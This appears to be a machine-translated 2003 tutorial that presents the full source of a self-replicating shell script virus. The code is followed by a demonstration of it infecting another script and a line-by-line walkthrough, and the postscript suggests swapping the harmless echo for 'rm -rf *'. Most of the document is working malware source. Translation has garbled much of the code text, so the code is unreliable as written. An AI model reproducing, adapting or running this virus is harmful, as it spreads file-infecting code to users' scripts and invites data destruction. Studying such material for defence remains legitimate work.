Introduction to Shell Virus
Author: Watercloudemail: Watercloud@xfocus.orghomepage: http://watercloud_at_xfocus.org
Introduction to Shell Virus
1 Introduction
Speaking of the virus always a little mysterious taste, I remembered that the pain used to write the first DOS virus before the beginning of the start to make it spent more than 3 months, and the written is also messy, and recently, the early admiration is not infected. Other files, spread yourself, write a virus with shell and not very simple, so we wrote such a small script, the function is to infect other shell programs.
This program is not very good in reality, but for the understanding of the image of the virus, it is still very helpful, it can be considered to be more interested in the actual significance.
2. Program code
#! / bin / sh # file name: Virus_Demo.sh # Used: SHELL virus presentation. # Description: The virus will infect all the files ending in the current directory, but will not repeat infection. # 编写: Watercloud@xfocus.org # Date: 2003-5-13
#B: < ! A% C & T:> vfile = $ _; vtmp = / tmp / .vtmp. $$ for f in ./*.sh; doif [! -W $ f -a! -R $ vfile] Thein Continue; FIIF GREP '< ! a% C & T:>' $ f; Then Continue; Fiif Sed -n '1P' $ f | grep 'csh'; Then Continue; FICP -F $ F $ VTMP; IF [ $? -ne 0]; THEN Continue; fivno = `awk '$ 0 ~ / (^ / b * #) | (^ / b * $) / && v == NR-1 {V } end {print 0 v} '$ vtmp`sed -n "1, $ {vno} p" $ VTMP> $ f (sed -n' / ^ # b: < ! a% C & T:> /, / ^ # E: < ! a % C & T:> / P '$ VFILE; Echo >> $ fno = `expr $ VNO 1`sed -n" $ {vno}, / $ p "$ VTMP >> $ frm -f $ vtmpdone> / dev / NULL 2> & 1unSet vtmp; unset vfile; unset vno
Echo "Hi, Here Is A Demo Shell Virus in Your Script!" # E: < ! a% C & T:> # EOF
How strong shell is so powerful, so short programs can infect other program files.
3. Demonstration
have a test:
First put two files in the current directory, a virus file, one for use to be infected. [Cloud @ / EXPORT / HOME / Cloud / Vir]> LS -LDRWXR-XR-X 2 Cloud Staff 512 6 ?? 4 17:43 ./drwxr-xr-x 10 Cloud Staff 1024 6 ?? 4 17:41. ./-rwxr ---R - 1 Cloud Staff 89 6 ?? 4 17:43 Test.sh-rwxr - r - 1 Cloud Staff 773 6 ?? 4 17:42 virus_demo.sh
Let's take a look at our "broiler" script, very simple: [Cloud @ / EXPORT / HOME / Cloud / Vir]> Cat Test.sh #! / Bin / sh # Just A Demo for Virus Test # author: foo # Date: 3000-1-1LS -L
#Eof
I started to infect him. [Cloud @ / EXPORT / HOME / Cloud / Vir]> ./virus_demo.shi, Here Is A Demo Shell Virus in Your Script!
To see the results after infection: [Cloud @ / export / home / cloud / vir]> cat test.sh #! / Bin / sh # Just a demo for virus test # author: foo # DATE: 3000-1-1
#B: < ! A% C & T:> vfile = $ _; vtmp = / tmp / .vtmp. $$ for f in ./*.sh; doif [! -W $ f -a! -R $ vfile] Thein Continue; FIIF GREP '< ! a% C & T:>' $ f; Then Continue; Fiif Sed -n '1P' $ f | grep 'csh'; Then Continue; FICP -F $ F $ VTMP; IF [ $? -ne 0]; THEN Continue; fivno = `awk '$ 0 ~ / (^ / b * #) | (^ / b * $) / && v == NR-1 {V } end {print 0 v} '$ vtmp`sed -n "1, $ {vno} p" $ VTMP> $ f (sed -n' / ^ # b: < ! a% C & T:> /, / ^ # E: < ! a % C & T:> / P '$ VFILE; Echo >> $ fno = `expr $ VNO 1`sed -n" $ {vno}, / $ p "$ VTMP >> $ frm -f $ vtmpdone> / dev / NULL 2> & 1unSet vtmp; unset vfile; unset vno
Echo "Hi, Here Is A Demo Shell Virus in Your Script!" # E: < ! a% C & T:>
LS -L
#Eof
Look, virus body: #b: < ! A% C & T:>.. #E: < ! A% C & T:> This virus is spread. It is worth noting that the location of the virus insertion is the beginning of the effective procedure of the source test.sh! This mainly considers that the general shell program has likes to make an annotation instructions in the start of the program, you can't put the information about others to go back, it is too obvious.
Let's take a look at our new virus body to see:
[Cloud @ / EXPORT / HOME / Cloud / Vir]> ./test.shi, Here Is A Demo Shell Virus in Your Script! <- Look at print information inside the virus body. -RWXR-XR-X 1 Cloud Staff 724 6 ?? 4 17:44 Test.sh-rwxr-xr-x 1 Cloud Staff 773 6 ?? 4 17:42 Virus_Demo.sh
4. Simple explanation
Let's analyze this virus step by step:
#B: < ! A% C & T:> Viral body start tag, used to copy its own positioning vfile = $ _; vtmp = / tmp / .vtmp. $$ Define two variables, a temporary file, a record current The program name $ _, this also requires us to take this line as the first line of the program, if we are put, we can't get the current program name, then find where to find a virus to copy.
For f in ./.sh; do starts loop, find out all. SH's end of the current directory.
IF [! -w $ f -a! -r $ vfile]; The continue; if the Fi target has a write permission, whether the viral source file has read permissions.
IF grep '< ! a% C & T:>' $ f; The continuous; fi target has been poisoned is very deeper, if this is another one to give him another time, is it too bad?
If SED-N '1P' $ F | GREP 'CSH'; The Continue; Fi If the target shell is too big in the syntax of CSH, give up.
CP -F $ F $ VTMP; if [$? -ne 0]; the continue; Fi is ready to infection, first copy a backup of the target, what should I do if the copy fails? Of course, I have to give up.
VNO = `awk '$ 0 ~ / (^ / b * #) | (^ / b * $) / && v == NR-1 {V } end {print 0 v}' $ vtmp` This is what? It seems that it is quite complicated, but learning shell virus does not understand awk and regular expressions seem to say something, this is the annotation and blank line of finding the program, so so that we determine the viral insertion point.
Sed -n "1, $ {vno} p" $ vtmp> $ f A sed command comes back from the backup file from the backup file from the backup file.
(SED -N '/ ^ # B: < ! a% C & T:> /, / ^ # e: < ! a% C & T:> / P' $ VFILE; Echo) >> $ f to another SED to complete the handling Work of viral body.
VNO = `expr $ VNO 1 `sed -n" $ {vno}, / $ p "$ vtmp >> $ f last SED moves the other parts of the target file, SED is really powerful! !
RM -F $ VTMP Clean up temporary files
DONE> / dev / null 2> & 1 loop end
Unset vtmp; unset vfile; unset vno Clean off the crime scene.
Echo "Hi, Here Is A Demo Shell Virus in Your Script!" is infected, and there is also something to tell others that this is a program that is infected by a virus.
#E: < ! A% C & T:> Viral body end tag, used for program copying yourself
5. Postscript
From this, we can see that the script virus is very simple. You don't need a lot of knowledge. You can write one, and the virus damage is not small. For example, the Echo information is changed to rm -rf *; at the same time, it also shows the power of the shell. At this point, trying to process how much effort to process the PE file structure and the ELF structure.
The above program has been tested on Linux and Solaris, and Windows should also do it on Cygwin.
By the way, it is emphasized that this article is to share this article to share with you, not to teach the virus out of the victim, remember to remember! # Eof # Game Overecho "Hope the ax!"
